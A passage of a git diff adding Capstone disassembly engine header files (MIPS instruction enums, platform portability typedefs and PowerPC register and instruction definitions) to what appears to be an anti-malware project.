+ MIPS_INS_MADDU, + MIPS_INS_MADDV, + MIPS_INS_MADD_Q, + MIPS_INS_MAQ_SA, + MIPS_INS_MAQ_S, + MIPS_INS_MAXA, + MIPS_INS_MAXI_S, + MIPS_INS_MAXI_U, + MIPS_INS_MAX_A, + MIPS_INS_MAX, + MIPS_INS_MAX_S, + MIPS_INS_MAX_U, + MIPS_INS_MFC0, + MIPS_INS_MFC1, + MIPS_INS_MFC2, + MIPS_INS_MFHC1, + MIPS_INS_MFHI, + MIPS_INS_MFLO, + MIPS_INS_MINA, + MIPS_INS_MINI_S, + MIPS_INS_MINI_U, + MIPS_INS_MIN_A, + MIPS_INS_MIN, + MIPS_INS_MIN_S, + MIPS_INS_MIN_U, + MIPS_INS_MOD, + MIPS_INS_MODSUB, + MIPS_INS_MODU, + MIPS_INS_MOD_S, + MIPS_INS_MOD_U, + MIPS_INS_MOVE, + MIPS_INS_MOVEP, + MIPS_INS_MOVF, + MIPS_INS_MOVN, + MIPS_INS_MOVT, + MIPS_INS_MOVZ, + MIPS_INS_MSUB, + MIPS_INS_MSUBF, + MIPS_INS_MSUBR_Q, + MIPS_INS_MSUBU, + MIPS_INS_MSUBV, + MIPS_INS_MSUB_Q, + MIPS_INS_MTC0, + MIPS_INS_MTC1, + MIPS_INS_MTC2, + MIPS_INS_MTHC1, + MIPS_INS_MTHI, + MIPS_INS_MTHLIP, + MIPS_INS_MTLO, + MIPS_INS_MTM0, + MIPS_INS_MTM1, + MIPS_INS_MTM2, + MIPS_INS_MTP0, + MIPS_INS_MTP1, + MIPS_INS_MTP2, + MIPS_INS_MUH, + MIPS_INS_MUHU, + MIPS_INS_MULEQ_S, + MIPS_INS_MULEU_S, + MIPS_INS_MULQ_RS, + MIPS_INS_MULQ_S, + MIPS_INS_MULR_Q, + MIPS_INS_MULSAQ_S, + MIPS_INS_MULSA, + MIPS_INS_MULT, + MIPS_INS_MULTU, + MIPS_INS_MULU, + MIPS_INS_MULV, + MIPS_INS_MUL_Q, + MIPS_INS_MUL_S, + MIPS_INS_NLOC, + MIPS_INS_NLZC, + MIPS_INS_NMADD, + MIPS_INS_NMSUB, + MIPS_INS_NOR, + MIPS_INS_NORI, + MIPS_INS_NOT16, + MIPS_INS_NOT, + MIPS_INS_OR, + MIPS_INS_OR16, + MIPS_INS_ORI, + MIPS_INS_PACKRL, + MIPS_INS_PAUSE, + MIPS_INS_PCKEV, + MIPS_INS_PCKOD, + MIPS_INS_PCNT, + MIPS_INS_PICK, + MIPS_INS_POP, + MIPS_INS_PRECEQU, + MIPS_INS_PRECEQ, + MIPS_INS_PRECEU, + MIPS_INS_PRECRQU_S, + MIPS_INS_PRECRQ, + MIPS_INS_PRECRQ_RS, + MIPS_INS_PRECR, + MIPS_INS_PRECR_SRA, + MIPS_INS_PRECR_SRA_R, + MIPS_INS_PREF, + MIPS_INS_PREPEND, + MIPS_INS_RADDU, + MIPS_INS_RDDSP, + MIPS_INS_RDHWR, + MIPS_INS_REPLV, + MIPS_INS_REPL, + MIPS_INS_RINT, + MIPS_INS_ROTR, + MIPS_INS_ROTRV, + MIPS_INS_ROUND, + MIPS_INS_SAT_S, + MIPS_INS_SAT_U, + MIPS_INS_SB, + MIPS_INS_SB16, + MIPS_INS_SC, + MIPS_INS_SCD, + MIPS_INS_SD, + MIPS_INS_SDBBP, + MIPS_INS_SDBBP16, + MIPS_INS_SDC1, + MIPS_INS_SDC2, + MIPS_INS_SDC3, + MIPS_INS_SDL, + MIPS_INS_SDR, + MIPS_INS_SDXC1, + MIPS_INS_SEB, + MIPS_INS_SEH, + MIPS_INS_SELEQZ, + MIPS_INS_SELNEZ, + MIPS_INS_SEL, + MIPS_INS_SEQ, + MIPS_INS_SEQI, + MIPS_INS_SH, + MIPS_INS_SH16, + MIPS_INS_SHF, + MIPS_INS_SHILO, + MIPS_INS_SHILOV, + MIPS_INS_SHLLV, + MIPS_INS_SHLLV_S, + MIPS_INS_SHLL, + MIPS_INS_SHLL_S, + MIPS_INS_SHRAV, + MIPS_INS_SHRAV_R, + MIPS_INS_SHRA, + MIPS_INS_SHRA_R, + MIPS_INS_SHRLV, + MIPS_INS_SHRL, + MIPS_INS_SLDI, + MIPS_INS_SLD, + MIPS_INS_SLL, + MIPS_INS_SLL16, + MIPS_INS_SLLI, + MIPS_INS_SLLV, + MIPS_INS_SLT, + MIPS_INS_SLTI, + MIPS_INS_SLTIU, + MIPS_INS_SLTU, + MIPS_INS_SNE, + MIPS_INS_SNEI, + MIPS_INS_SPLATI, + MIPS_INS_SPLAT, + MIPS_INS_SRA, + MIPS_INS_SRAI, + MIPS_INS_SRARI, + MIPS_INS_SRAR, + MIPS_INS_SRAV, + MIPS_INS_SRL, + MIPS_INS_SRL16, + MIPS_INS_SRLI, + MIPS_INS_SRLRI, + MIPS_INS_SRLR, + MIPS_INS_SRLV, + MIPS_INS_SSNOP, + MIPS_INS_ST, + MIPS_INS_SUBQH, + MIPS_INS_SUBQH_R, + MIPS_INS_SUBQ, + MIPS_INS_SUBQ_S, + MIPS_INS_SUBSUS_U, + MIPS_INS_SUBSUU_S, + MIPS_INS_SUBS_S, + MIPS_INS_SUBS_U, + MIPS_INS_SUBU16, + MIPS_INS_SUBUH, + MIPS_INS_SUBUH_R, + MIPS_INS_SUBU, + MIPS_INS_SUBU_S, + MIPS_INS_SUBVI, + MIPS_INS_SUBV, + MIPS_INS_SUXC1, + MIPS_INS_SW, + MIPS_INS_SW16, + MIPS_INS_SWC1, + MIPS_INS_SWC2, + MIPS_INS_SWC3, + MIPS_INS_SWL, + MIPS_INS_SWM16, + MIPS_INS_SWM32, + MIPS_INS_SWP, + MIPS_INS_SWR, + MIPS_INS_SWXC1, + MIPS_INS_SYNC, + MIPS_INS_SYNCI, + MIPS_INS_SYSCALL, + MIPS_INS_TEQ, + MIPS_INS_TEQI, + MIPS_INS_TGE, + MIPS_INS_TGEI, + MIPS_INS_TGEIU, + MIPS_INS_TGEU, + MIPS_INS_TLBP, + MIPS_INS_TLBR, + MIPS_INS_TLBWI, + MIPS_INS_TLBWR, + MIPS_INS_TLT, + MIPS_INS_TLTI, + MIPS_INS_TLTIU, + MIPS_INS_TLTU, + MIPS_INS_TNE, + MIPS_INS_TNEI, + MIPS_INS_TRUNC, + MIPS_INS_V3MULU, + MIPS_INS_VMM0, + MIPS_INS_VMULU, + MIPS_INS_VSHF, + MIPS_INS_WAIT, + MIPS_INS_WRDSP, + MIPS_INS_WSBH, + MIPS_INS_XOR, + MIPS_INS_XOR16, + MIPS_INS_XORI, + + //> some alias instructions + MIPS_INS_NOP, + MIPS_INS_NEGU, + + //> special instructions + MIPS_INS_JALR_HB, // jump and link with Hazard Barrier + MIPS_INS_JR_HB, // jump register with Hazard Barrier + + MIPS_INS_ENDING, +} mips_insn; + +/// Group of MIPS instructions +typedef enum mips_insn_group { + MIPS_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + MIPS_GRP_JUMP, ///< = CS_GRP_JUMP + // all call instructions + MIPS_GRP_CALL, ///< = CS_GRP_CALL + // all return instructions + MIPS_GRP_RET, ///< = CS_GRP_RET + // all interrupt instructions (int+syscall) + MIPS_GRP_INT, ///< = CS_GRP_INT + // all interrupt return instructions + MIPS_GRP_IRET, ///< = CS_GRP_IRET + // all privileged instructions + MIPS_GRP_PRIVILEGE, ///< = CS_GRP_PRIVILEGE + // all relative branching instructions + MIPS_GRP_BRANCH_RELATIVE, ///< = CS_GRP_BRANCH_RELATIVE + + // Architecture-specific groups + MIPS_GRP_BITCOUNT = 128, + MIPS_GRP_DSP, + MIPS_GRP_DSPR2, + MIPS_GRP_FPIDX, + MIPS_GRP_MSA, + MIPS_GRP_MIPS32R2, + MIPS_GRP_MIPS64, + MIPS_GRP_MIPS64R2, + MIPS_GRP_SEINREG, + MIPS_GRP_STDENC, + MIPS_GRP_SWAP, + MIPS_GRP_MICROMIPS, + MIPS_GRP_MIPS16MODE, + MIPS_GRP_FP64BIT, + MIPS_GRP_NONANSFPMATH, + MIPS_GRP_NOTFP64BIT, + MIPS_GRP_NOTINMICROMIPS, + MIPS_GRP_NOTNACL, + MIPS_GRP_NOTMIPS32R6, + MIPS_GRP_NOTMIPS64R6, + MIPS_GRP_CNMIPS, + MIPS_GRP_MIPS32, + MIPS_GRP_MIPS32R6, + MIPS_GRP_MIPS64R6, + MIPS_GRP_MIPS2, + MIPS_GRP_MIPS3, + MIPS_GRP_MIPS3_32, + MIPS_GRP_MIPS3_32R2, + MIPS_GRP_MIPS4_32, + MIPS_GRP_MIPS4_32R2, + MIPS_GRP_MIPS5_32R2, + MIPS_GRP_GP32BIT, + MIPS_GRP_GP64BIT, + + MIPS_GRP_ENDING, +} mips_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/platform.h b/ai_anti_malware/capstone/include/capstone/platform.h new file mode 100644 index 0000000..a5a4bd2 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/platform.h @@ -0,0 +1,122 @@ +/* Capstone Disassembly Engine */ +/* By Axel Souchet & Nguyen Anh Quynh, 2014 */ + +#ifndef CAPSTONE_PLATFORM_H +#define CAPSTONE_PLATFORM_H + + +// handle C99 issue (for pre-2013 VisualStudio) +#if !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) +// MSVC + +// stdbool.h +#if (_MSC_VER < 1800) || defined(_KERNEL_MODE) +// this system does not have stdbool.h +#ifndef __cplusplus +typedef unsigned char bool; +#define false 0 +#define true 1 +#endif // __cplusplus + +#else +// VisualStudio 2013+ -> C99 is supported +#include +#endif // (_MSC_VER < 1800) || defined(_KERNEL_MODE) + +#else +// not MSVC -> C99 is supported +#include +#endif // !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) + + +// handle inttypes.h / stdint.h compatibility +#if defined(_WIN32_WCE) && (_WIN32_WCE < 0x800) +#include "windowsce/stdint.h" +#endif // defined(_WIN32_WCE) && (_WIN32_WCE < 0x800) + +#if defined(CAPSTONE_HAS_OSXKERNEL) || (defined(_MSC_VER) && (_MSC_VER <= 1700 || defined(_KERNEL_MODE))) +// this system does not have inttypes.h + +#if defined(_MSC_VER) && (_MSC_VER <= 1600 || defined(_KERNEL_MODE)) +// this system does not have stdint.h +typedef signed char int8_t; +typedef signed short int16_t; +typedef signed int int32_t; +typedef unsigned char uint8_t; +typedef unsigned short uint16_t; +typedef unsigned int uint32_t; +typedef signed long long int64_t; +typedef unsigned long long uint64_t; +#endif // defined(_MSC_VER) && (_MSC_VER <= 1600 || defined(_KERNEL_MODE)) + +#if defined(_MSC_VER) && (_MSC_VER < 1600 || defined(_KERNEL_MODE)) +#define INT8_MIN (-127i8 - 1) +#define INT16_MIN (-32767i16 - 1) +#define INT32_MIN (-2147483647i32 - 1) +#define INT64_MIN (-9223372036854775807i64 - 1) +#define INT8_MAX 127i8 +#define INT16_MAX 32767i16 +#define INT32_MAX 2147483647i32 +#define INT64_MAX 9223372036854775807i64 +#define UINT8_MAX 0xffui8 +#define UINT16_MAX 0xffffui16 +#define UINT32_MAX 0xffffffffui32 +#define UINT64_MAX 0xffffffffffffffffui64 +#endif // defined(_MSC_VER) && (_MSC_VER < 1600 || defined(_KERNEL_MODE)) + +#ifdef CAPSTONE_HAS_OSXKERNEL +// this system has stdint.h +#include +#endif + +#define __PRI_8_LENGTH_MODIFIER__ "hh" +#define __PRI_64_LENGTH_MODIFIER__ "ll" + +#define PRId8 __PRI_8_LENGTH_MODIFIER__ "d" +#define PRIi8 __PRI_8_LENGTH_MODIFIER__ "i" +#define PRIo8 __PRI_8_LENGTH_MODIFIER__ "o" +#define PRIu8 __PRI_8_LENGTH_MODIFIER__ "u" +#define PRIx8 __PRI_8_LENGTH_MODIFIER__ "x" +#define PRIX8 __PRI_8_LENGTH_MODIFIER__ "X" + +#define PRId16 "hd" +#define PRIi16 "hi" +#define PRIo16 "ho" +#define PRIu16 "hu" +#define PRIx16 "hx" +#define PRIX16 "hX" + +#if defined(_MSC_VER) && _MSC_VER <= 1700 +#define PRId32 "ld" +#define PRIi32 "li" +#define PRIo32 "lo" +#define PRIu32 "lu" +#define PRIx32 "lx" +#define PRIX32 "lX" +#else // OSX +#define PRId32 "d" +#define PRIi32 "i" +#define PRIo32 "o" +#define PRIu32 "u" +#define PRIx32 "x" +#define PRIX32 "X" +#endif // defined(_MSC_VER) && _MSC_VER <= 1700 + +#if defined(_MSC_VER) && _MSC_VER <= 1700 +// redefine functions from inttypes.h used in cstool +#define strtoull _strtoui64 +#endif + +#define PRId64 __PRI_64_LENGTH_MODIFIER__ "d" +#define PRIi64 __PRI_64_LENGTH_MODIFIER__ "i" +#define PRIo64 __PRI_64_LENGTH_MODIFIER__ "o" +#define PRIu64 __PRI_64_LENGTH_MODIFIER__ "u" +#define PRIx64 __PRI_64_LENGTH_MODIFIER__ "x" +#define PRIX64 __PRI_64_LENGTH_MODIFIER__ "X" + +#else +// this system has inttypes.h by default +#include +#endif // defined(CAPSTONE_HAS_OSXKERNEL) || (defined(_MSC_VER) && (_MSC_VER <= 1700 || defined(_KERNEL_MODE))) + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/ppc.h b/ai_anti_malware/capstone/include/capstone/ppc.h new file mode 100644 index 0000000..97ce15b --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/ppc.h @@ -0,0 +1,1463 @@ +#ifndef CAPSTONE_PPC_H +#define CAPSTONE_PPC_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// PPC branch codes for some branch instructions +typedef enum ppc_bc { + PPC_BC_INVALID = 0, + PPC_BC_LT = (0 << 5) | 12, + PPC_BC_LE = (1 << 5) | 4, + PPC_BC_EQ = (2 << 5) | 12, + PPC_BC_GE = (0 << 5) | 4, + PPC_BC_GT = (1 << 5) | 12, + PPC_BC_NE = (2 << 5) | 4, + PPC_BC_UN = (3 << 5) | 12, + PPC_BC_NU = (3 << 5) | 4, + + // extra conditions + PPC_BC_SO = (4 << 5) | 12, ///< summary overflow + PPC_BC_NS = (4 << 5) | 4, ///< not summary overflow +} ppc_bc; + +/// PPC branch hint for some branch instructions +typedef enum ppc_bh { + PPC_BH_INVALID = 0, ///< no hint + PPC_BH_PLUS, ///< PLUS hint + PPC_BH_MINUS, ///< MINUS hint +} ppc_bh; + +/// Operand type for instruction's operands +typedef enum ppc_op_type { + PPC_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + PPC_OP_REG, ///< = CS_OP_REG (Register operand). + PPC_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + PPC_OP_MEM, ///< = CS_OP_MEM (Memory operand). + PPC_OP_CRX = 64, ///< Condition Register field +} ppc_op_type; + +/// PPC registers +typedef enum ppc_reg { + PPC_REG_INVALID = 0, + + PPC_REG_CARRY, + PPC_REG_CR0, + PPC_REG_CR1, + PPC_REG_CR2, + PPC_REG_CR3, + PPC_REG_CR4, + PPC_REG_CR5, + PPC_REG_CR6, + PPC_REG_CR7, + PPC_REG_CTR, + PPC_REG_F0, + PPC_REG_F1, + PPC_REG_F2, + PPC_REG_F3, + PPC_REG_F4, + PPC_REG_F5, + PPC_REG_F6, + PPC_REG_F7, + PPC_REG_F8, + PPC_REG_F9, + PPC_REG_F10, + PPC_REG_F11, + PPC_REG_F12, + PPC_REG_F13, + PPC_REG_F14, + PPC_REG_F15, + PPC_REG_F16, + PPC_REG_F17, + PPC_REG_F18, + PPC_REG_F19, + PPC_REG_F20, + PPC_REG_F21, + PPC_REG_F22, + PPC_REG_F23, + PPC_REG_F24, + PPC_REG_F25, + PPC_REG_F26, + PPC_REG_F27, + PPC_REG_F28, + PPC_REG_F29, + PPC_REG_F30, + PPC_REG_F31, + PPC_REG_LR, + PPC_REG_R0, + PPC_REG_R1, + PPC_REG_R2, + PPC_REG_R3, + PPC_REG_R4, + PPC_REG_R5, + PPC_REG_R6, + PPC_REG_R7, + PPC_REG_R8, + PPC_REG_R9, + PPC_REG_R10, + PPC_REG_R11, + PPC_REG_R12, + PPC_REG_R13, + PPC_REG_R14, + PPC_REG_R15, + PPC_REG_R16, + PPC_REG_R17, + PPC_REG_R18, + PPC_REG_R19, + PPC_REG_R20, + PPC_REG_R21, + PPC_REG_R22, + PPC_REG_R23, + PPC_REG_R24, + PPC_REG_R25, + PPC_REG_R26, + PPC_REG_R27, + PPC_REG_R28, + PPC_REG_R29, + PPC_REG_R30, + PPC_REG_R31, + PPC_REG_V0, + PPC_REG_V1, + PPC_REG_V2, + PPC_REG_V3, + PPC_REG_V4, + PPC_REG_V5, + PPC_REG_V6, + PPC_REG_V7, + PPC_REG_V8, + PPC_REG_V9, + PPC_REG_V10, + PPC_REG_V11, + PPC_REG_V12, + PPC_REG_V13, + PPC_REG_V14, + PPC_REG_V15, + PPC_REG_V16, + PPC_REG_V17, + PPC_REG_V18, + PPC_REG_V19, + PPC_REG_V20, + PPC_REG_V21, + PPC_REG_V22, + PPC_REG_V23, + PPC_REG_V24, + PPC_REG_V25, + PPC_REG_V26, + PPC_REG_V27, + PPC_REG_V28, + PPC_REG_V29, + PPC_REG_V30, + PPC_REG_V31, + PPC_REG_VRSAVE, + PPC_REG_VS0, + PPC_REG_VS1, + PPC_REG_VS2, + PPC_REG_VS3, + PPC_REG_VS4, + PPC_REG_VS5, + PPC_REG_VS6, + PPC_REG_VS7, + PPC_REG_VS8, + PPC_REG_VS9, + PPC_REG_VS10, + PPC_REG_VS11, + PPC_REG_VS12, + PPC_REG_VS13, + PPC_REG_VS14, + PPC_REG_VS15, + PPC_REG_VS16, + PPC_REG_VS17, + PPC_REG_VS18, + PPC_REG_VS19, + PPC_REG_VS20, + PPC_REG_VS21, + PPC_REG_VS22, + PPC_REG_VS23, + PPC_REG_VS24, + PPC_REG_VS25, + PPC_REG_VS26, + PPC_REG_VS27, + PPC_REG_VS28, + PPC_REG_VS29, + PPC_REG_VS30, + PPC_REG_VS31, + PPC_REG_VS32, + PPC_REG_VS33, + PPC_REG_VS34, + PPC_REG_VS35, + PPC_REG_VS36, + PPC_REG_VS37, + PPC_REG_VS38, + PPC_REG_VS39, + PPC_REG_VS40, + PPC_REG_VS41, + PPC_REG_VS42, + PPC_REG_VS43, + PPC_REG_VS44, + PPC_REG_VS45, + PPC_REG_VS46, + PPC_REG_VS47, + PPC_REG_VS48, + PPC_REG_VS49, + PPC_REG_VS50, + PPC_REG_VS51, + PPC_REG_VS52, + PPC_REG_VS53, + PPC_REG_VS54, + PPC_REG_VS55, + PPC_REG_VS56, + PPC_REG_VS57, + PPC_REG_VS58, + PPC_REG_VS59, + PPC_REG_VS60, + PPC_REG_VS61, + PPC_REG_VS62, + PPC_REG_VS63, + PPC_REG_Q0, + PPC_REG_Q1, + PPC_REG_Q2, + PPC_REG_Q3, + PPC_REG_Q4, + PPC_REG_Q5, + PPC_REG_Q6, + PPC_REG_Q7, + PPC_REG_Q8, + PPC_REG_Q9, + PPC_REG_Q10, + PPC_REG_Q11, + PPC_REG_Q12, + PPC_REG_Q13, + PPC_REG_Q14, + PPC_REG_Q15, + PPC_REG_Q16, + PPC_REG_Q17, + PPC_REG_Q18, + PPC_REG_Q19, + PPC_REG_Q20, + PPC_REG_Q21, + PPC_REG_Q22, + PPC_REG_Q23, + PPC_REG_Q24, + PPC_REG_Q25, + PPC_REG_Q26, + PPC_REG_Q27, + PPC_REG_Q28, + PPC_REG_Q29, + PPC_REG_Q30, + PPC_REG_Q31, + + // extra registers for PPCMapping.c + PPC_REG_RM, + PPC_REG_CTR8, + PPC_REG_LR8, + PPC_REG_CR1EQ, + PPC_REG_X2, + + PPC_REG_ENDING, // <-- mark the end of the list of registers +} ppc_reg; + +/// Instruction's operand referring to memory +/// This is associated with PPC_OP_MEM operand type above +typedef struct ppc_op_mem { + ppc_reg base; ///< base register + int32_t disp; ///< displacement/offset value +} ppc_op_mem; + +typedef struct ppc_op_crx { + unsigned int scale; + ppc_reg reg; + ppc_bc cond; +} ppc_op_crx; + +/// Instruction operand +typedef struct cs_ppc_op { + ppc_op_type type; ///< operand type + union { + ppc_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value for IMM operand + ppc_op_mem mem; ///< base/disp value for MEM operand + ppc_op_crx crx; ///< operand with condition register + }; +} cs_ppc_op; + +/// Instruction structure +typedef struct cs_ppc { + /// branch code for branch instructions + ppc_bc bc; + + /// branch hint for branch instructions + ppc_bh bh; + + /// if update_cr0 = True, then this 'dot' insn updates CR0 + bool update_cr0; + + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + cs_ppc_op operands[8]; ///< operands for this instruction. +} cs_ppc; + +/// PPC instruction +typedef enum ppc_insn { + PPC_INS_INVALID = 0, + + PPC_INS_ADD, + PPC_INS_ADDC, + PPC_INS_ADDE, + PPC_INS_ADDI, + PPC_INS_ADDIC, + PPC_INS_ADDIS, + PPC_INS_ADDME, + PPC_INS_ADDZE, + PPC_INS_AND, + PPC_INS_ANDC, + PPC_INS_ANDIS, + PPC_INS_ANDI, + PPC_INS_ATTN, + PPC_INS_B, + PPC_INS_BA, + PPC_INS_BC, + PPC_INS_BCCTR, + PPC_INS_BCCTRL, + PPC_INS_BCL, + PPC_INS_BCLR, + PPC_INS_BCLRL, + PPC_INS_BCTR, + PPC_INS_BCTRL, + PPC_INS_BCT, + PPC_INS_BDNZ, + PPC_INS_BDNZA, + PPC_INS_BDNZL, + PPC_INS_BDNZLA, + PPC_INS_BDNZLR, + PPC_INS_BDNZLRL, + PPC_INS_BDZ, + PPC_INS_BDZA, + PPC_INS_BDZL, + PPC_INS_BDZLA, + PPC_INS_BDZLR, + PPC_INS_BDZLRL, + PPC_INS_BL, + PPC_INS_BLA, + PPC_INS_BLR, + PPC_INS_BLRL, + PPC_INS_BRINC, + PPC_INS_CMPB, + PPC_INS_CMPD, + PPC_INS_CMPDI, + PPC_INS_CMPLD, + PPC_INS_CMPLDI, + PPC_INS_CMPLW, + PPC_INS_CMPLWI, + PPC_INS_CMPW, + PPC_INS_CMPWI, + PPC_INS_CNTLZD, + PPC_INS_CNTLZW, + PPC_INS_CREQV, + PPC_INS_CRXOR, + PPC_INS_CRAND, + PPC_INS_CRANDC, + PPC_INS_CRNAND, + PPC_INS_CRNOR, + PPC_INS_CROR, + PPC_INS_CRORC, + PPC_INS_DCBA, + PPC_INS_DCBF, + PPC_INS_DCBI, + PPC_INS_DCBST, + PPC_INS_DCBT, + PPC_INS_DCBTST, + PPC_INS_DCBZ, + PPC_INS_DCBZL, + PPC_INS_DCCCI, + PPC_INS_DIVD, + PPC_INS_DIVDU, + PPC_INS_DIVW, + PPC_INS_DIVWU, + PPC_INS_DSS, + PPC_INS_DSSALL, + PPC_INS_DST, + PPC_INS_DSTST, + PPC_INS_DSTSTT, + PPC_INS_DSTT, + PPC_INS_EQV, + PPC_INS_EVABS, + PPC_INS_EVADDIW, + PPC_INS_EVADDSMIAAW, + PPC_INS_EVADDSSIAAW, + PPC_INS_EVADDUMIAAW, + PPC_INS_EVADDUSIAAW, + PPC_INS_EVADDW, + PPC_INS_EVAND, + PPC_INS_EVANDC, + PPC_INS_EVCMPEQ, + PPC_INS_EVCMPGTS, + PPC_INS_EVCMPGTU, + PPC_INS_EVCMPLTS, + PPC_INS_EVCMPLTU, + PPC_INS_EVCNTLSW, + PPC_INS_EVCNTLZW, + PPC_INS_EVDIVWS, + PPC_INS_EVDIVWU, + PPC_INS_EVEQV, + PPC_INS_EVEXTSB, + PPC_INS_EVEXTSH, + PPC_INS_EVLDD, + PPC_INS_EVLDDX, + PPC_INS_EVLDH, + PPC_INS_EVLDHX, + PPC_INS_EVLDW, + PPC_INS_EVLDWX, + PPC_INS_EVLHHESPLAT, + PPC_INS_EVLHHESPLATX, + PPC_INS_EVLHHOSSPLAT, + PPC_INS_EVLHHOSSPLATX, + PPC_INS_EVLHHOUSPLAT, + PPC_INS_EVLHHOUSPLATX, + PPC_INS_EVLWHE, + PPC_INS_EVLWHEX, + PPC_INS_EVLWHOS, + PPC_INS_EVLWHOSX, + PPC_INS_EVLWHOU, + PPC_INS_EVLWHOUX, + PPC_INS_EVLWHSPLAT, + PPC_INS_EVLWHSPLATX, + PPC_INS_EVLWWSPLAT, + PPC_INS_EVLWWSPLATX, + PPC_INS_EVMERGEHI, + PPC_INS_EVMERGEHILO, + PPC_INS_EVMERGELO, + PPC_INS_EVMERGELOHI, + PPC_INS_EVMHEGSMFAA, + PPC_INS_EVMHEGSMFAN, + PPC_INS_EVMHEGSMIAA, + PPC_INS_EVMHEGSMIAN, + PPC_INS_EVMHEGUMIAA, + PPC_INS_EVMHEGUMIAN, + PPC_INS_EVMHESMF, + PPC_INS_EVMHESMFA, + PPC_INS_EVMHESMFAAW, + PPC_INS_EVMHESMFANW, + PPC_INS_EVMHESMI, + PPC_INS_EVMHESMIA, + PPC_INS_EVMHESMIAAW, + PPC_INS_EVMHESMIANW, + PPC_INS_EVMHESSF, + PPC_INS_EVMHESSFA, + PPC_INS_EVMHESSFAAW, + PPC_INS_EVMHESSFANW, + PPC_INS_EVMHESSIAAW, + PPC_INS_EVMHESSIANW, + PPC_INS_EVMHEUMI, + PPC_INS_EVMHEUMIA, + PPC_INS_EVMHEUMIAAW, + PPC_INS_EVMHEUMIANW, + PPC_INS_EVMHEUSIAAW, + PPC_INS_EVMHEUSIANW, + PPC_INS_EVMHOGSMFAA, + PPC_INS_EVMHOGSMFAN, + PPC_INS_EVMHOGSMIAA, + PPC_INS_EVMHOGSMIAN, + PPC_INS_EVMHOGUMIAA, + PPC_INS_EVMHOGUMIAN, + PPC_INS_EVMHOSMF, + PPC_INS_EVMHOSMFA, + PPC_INS_EVMHOSMFAAW, + PPC_INS_EVMHOSMFANW, + PPC_INS_EVMHOSMI, + PPC_INS_EVMHOSMIA, + PPC_INS_EVMHOSMIAAW, + PPC_INS_EVMHOSMIANW, + PPC_INS_EVMHOSSF, + PPC_INS_EVMHOSSFA, + PPC_INS_EVMHOSSFAAW, + PPC_INS_EVMHOSSFANW, + PPC_INS_EVMHOSSIAAW, + PPC_INS_EVMHOSSIANW, + PPC_INS_EVMHOUMI, + PPC_INS_EVMHOUMIA, + PPC_INS_EVMHOUMIAAW, + PPC_INS_EVMHOUMIANW, + PPC_INS_EVMHOUSIAAW, + PPC_INS_EVMHOUSIANW, + PPC_INS_EVMRA, + PPC_INS_EVMWHSMF, + PPC_INS_EVMWHSMFA, + PPC_INS_EVMWHSMI, + PPC_INS_EVMWHSMIA, + PPC_INS_EVMWHSSF, + PPC_INS_EVMWHSSFA, + PPC_INS_EVMWHUMI, + PPC_INS_EVMWHUMIA, + PPC_INS_EVMWLSMIAAW, + PPC_INS_EVMWLSMIANW, + PPC_INS_EVMWLSSIAAW, + PPC_INS_EVMWLSSIANW, + PPC_INS_EVMWLUMI, + PPC_INS_EVMWLUMIA, + PPC_INS_EVMWLUMIAAW, + PPC_INS_EVMWLUMIANW, + PPC_INS_EVMWLUSIAAW, + PPC_INS_EVMWLUSIANW, + PPC_INS_EVMWSMF, + PPC_INS_EVMWSMFA, + PPC_INS_EVMWSMFAA, + PPC_INS_EVMWSMFAN, + PPC_INS_EVMWSMI, + PPC_INS_EVMWSMIA, + PPC_INS_EVMWSMIAA, + PPC_INS_EVMWSMIAN, + PPC_INS_EVMWSSF, + PPC_INS_EVMWSSFA, + PPC_INS_EVMWSSFAA, + PPC_INS_EVMWSSFAN, + PPC_INS_EVMWUMI, + PPC_INS_EVMWUMIA, + PPC_INS_EVMWUMIAA, + PPC_INS_EVMWUMIAN, + PPC_INS_EVNAND, + PPC_INS_EVNEG, + PPC_INS_EVNOR, + PPC_INS_EVOR, + PPC_INS_EVORC, + PPC_INS_EVRLW, + PPC_INS_EVRLWI, + PPC_INS_EVRNDW, + PPC_INS_EVSLW, + PPC_INS_EVSLWI, + PPC_INS_EVSPLATFI, + PPC_INS_EVSPLATI, + PPC_INS_EVSRWIS, + PPC_INS_EVSRWIU, + PPC_INS_EVSRWS, + PPC_INS_EVSRWU, + PPC_INS_EVSTDD, + PPC_INS_EVSTDDX, + PPC_INS_EVSTDH, + PPC_INS_EVSTDHX, + PPC_INS_EVSTDW, + PPC_INS_EVSTDWX, + PPC_INS_EVSTWHE, + PPC_INS_EVSTWHEX, + PPC_INS_EVSTWHO, + PPC_INS_EVSTWHOX, + PPC_INS_EVSTWWE, + PPC_INS_EVSTWWEX, + PPC_INS_EVSTWWO, + PPC_INS_EVSTWWOX, + PPC_INS_EVSUBFSMIAAW, + PPC_INS_EVSUBFSSIAAW, + PPC_INS_EVSUBFUMIAAW, + PPC_INS_EVSUBFUSIAAW, + PPC_INS_EVSUBFW, + PPC_INS_EVSUBIFW, + PPC_INS_EVXOR, + PPC_INS_EXTSB, + PPC_INS_EXTSH, + PPC_INS_EXTSW, + PPC_INS_EIEIO, + PPC_INS_FABS, + PPC_INS_FADD, + PPC_INS_FADDS, + PPC_INS_FCFID, + PPC_INS_FCFIDS, + PPC_INS_FCFIDU, + PPC_INS_FCFIDUS, + PPC_INS_FCMPU, + PPC_INS_FCPSGN, + PPC_INS_FCTID, + PPC_INS_FCTIDUZ, + PPC_INS_FCTIDZ, + PPC_INS_FCTIW, + PPC_INS_FCTIWUZ, + PPC_INS_FCTIWZ, + PPC_INS_FDIV, + 